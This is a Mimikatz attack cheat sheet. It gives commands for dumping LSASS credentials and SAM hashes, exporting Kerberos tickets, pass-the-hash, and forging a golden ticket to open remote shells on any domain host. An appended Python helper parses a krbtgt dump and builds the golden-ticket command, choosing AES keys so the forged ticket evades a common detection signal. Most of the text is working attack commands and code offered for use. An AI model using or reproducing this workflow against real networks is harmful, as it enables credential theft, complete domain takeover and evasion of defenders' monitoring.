Mimikatz
Overview
https://github.com/gentilkiwi/mimikatz
There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimikatz is primarily used to dump credentials (NTLM hashes, Kerberos keys and sometimes plaintext passwords) from LSASS, to pass the hash, and to forge Kerberos tickets for use in attacks.
General Usage
Elevate to Highest Integrity Level
Start mimikatz from an administrator prompt. privilege::debug enables SeDebugPrivilege so that LSASS can be opened; token::elevate impersonates a SYSTEM token, which the lsadump commands below require.
C:\ > mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
Dump Credentials from LSASS Memory
Lists every logon session held in LSASS with its NTLM hash, Kerberos keys and, where WDigest is still enabled, the plaintext password.
mimikatz # sekurlsa::logonpasswords
Dump SAM
Local account hashes from the SAM database; needs the SYSTEM token obtained with token::elevate.
mimikatz # lsadump::sam
Dump Cached Kerberos Tickets
Lists the TGTs and service tickets cached in LSASS for all logon sessions; add /export to write them to disk as .kirbi files.
mimikatz # sekurlsa::tickets
Overpass the Hash
Create a TGT using a dumped NTLM hash. sekurlsa::pth starts a new process (cmd.exe by default) in a logon session seeded with the hash; the KDC issues a TGT for that account the first time the process authenticates to a domain service.
mimikatz # sekurlsa::pth /user:username /ntlm:hash-here /domain:domain.tld
Golden Ticket Attack
If an attacker runs mimikatz on a domain controller (or holds replication rights and uses lsadump::dcsync /user:krbtgt from any domain-joined host), they can read the Kerberos key of the krbtgt account and forge TGTs for any principal, which grants access to any resource in the domain.
C:\ > mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt
- Copy the domain SID
- Copy the NTLM hash of the krbtgt account
mimikatz # kerberos::golden /User:Administrator /domain:domain.tld /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /id:500 /ptt
mimikatz # misc::cmd
Now a command prompt is running with the golden ticket we created
C:\ > psexec.exe \\hostname cmd.exe
This opens a remote command prompt on any host in the domain: the forged ticket names Administrator (RID 500) and carries mimikatz's default privileged group set, so domain members accept it. Target the host by DNS name, not IP address; Kerberos needs a service principal name, and with an IP PsExec falls back to NTLM, where the ticket is never presented. The ticket stays valid until the krbtgt password has been changed twice.
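The golden ticket procedure above has two places where a copy-and-paste slip silently produces a useless ticket: pasting an account SID (with a trailing RID) instead of the domain SID, or pointing PsExec at an IP address so that Kerberos is never used. The following is an added example, not Mimikatz project code, that reads a saved lsadump::lsa /inject /name:krbtgt listing, validates the SID and key lengths, composes the kerberos::golden line, and checks the PsExec target. The listing is a constructed sample with a fake SID and fake keys. It goes one step beyond the page's command by preferring the /aes256 switch over /krbtgt when an AES key was dumped (both are real mimikatz switches); the FQDN is supplied by the caller because the Domain line only carries the NetBIOS name.

```python
import ipaddress
import re

# Constructed sample of `lsadump::lsa /inject /name:krbtgt` output with a fake
# domain SID and fake keys; only the lines this parser reads are reproduced.
SAMPLE_KRBTGT_DUMP = """\
Domain : CORP / S-1-5-21-1111111111-2222222222-3333333333

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 0f0e0d0c0b0a09080706050403020100
    LM   :
  Hash NTLM: 0f0e0d0c0b0a09080706050403020100

 * Kerberos-Newer-Keys
    Default Salt : CORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
      aes128_hmac       (4096) : 00112233445566778899aabbccddeeff
      des_cbc_md5       (4096) : 0011223344556677
"""

# A domain SID is S-1-5-21 followed by exactly three sub-authorities.  A value
# with a fourth component is an account SID (RID appended); handing that to
# kerberos::golden forges a ticket whose PAC names a domain that does not exist.
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+$")


def parse_krbtgt_dump(text):
    """Pull the NetBIOS name, domain SID, NTLM hash and AES-256 key out of
    lsadump::lsa /inject /name:krbtgt output, validating each field."""
    m = re.search(r"^Domain\s*:\s*(\S+)\s*/\s*(S-[\d-]+)\s*$", text, re.M)
    if not m:
        raise ValueError("no 'Domain : NAME / SID' line found")
    netbios, sid = m.group(1), m.group(2)
    if not DOMAIN_SID_RE.match(sid):
        raise ValueError(f"not a domain SID: {sid}")
    m = re.search(r"^\s*NTLM\s*:\s*([0-9a-fA-F]{32})\s*$", text, re.M)
    if not m:
        raise ValueError("no 32-hex NTLM hash found under 'Primary'")
    ntlm = m.group(1).lower()
    m = re.search(r"^\s*aes256_hmac\s*\(\d+\)\s*:\s*([0-9a-fA-F]{64})\s*$", text, re.M)
    aes256 = m.group(1).lower() if m else None   # may be absent in older domains
    return {"netbios": netbios, "sid": sid, "ntlm": ntlm, "aes256": aes256}


def golden_command(info, fqdn, user="Administrator", rid=500, prefer_aes=True):
    """Compose the kerberos::golden line from the section above.

    With prefer_aes the ticket is keyed with /aes256 instead of /krbtgt: an
    RC4 (etype 0x17) TGT in a domain whose accounts otherwise use AES stands
    out in event 4769 and is a common detection signal."""
    if prefer_aes and info["aes256"]:
        key = f"/aes256:{info['aes256']}"
    else:
        key = f"/krbtgt:{info['ntlm']}"
    return (f"kerberos::golden /user:{user} /domain:{fqdn} /sid:{info['sid']} "
            f"{key} /id:{rid} /ptt")


def is_kerberos_target(host):
    """True if `host` can be reached with the injected ticket.  An IP literal
    has no service principal name, so PsExec falls back to NTLM and the golden
    ticket is never presented; use the DNS host name instead."""
    try:
        ipaddress.ip_address(host)
        return False
    except ValueError:
        return bool(host.strip())
```

Run parse_krbtgt_dump over the saved listing, hand the result to golden_command with the domain's FQDN, and check the PsExec target with is_kerberos_target before launching it; a ValueError from the parser means the pasted listing is not usable as-is.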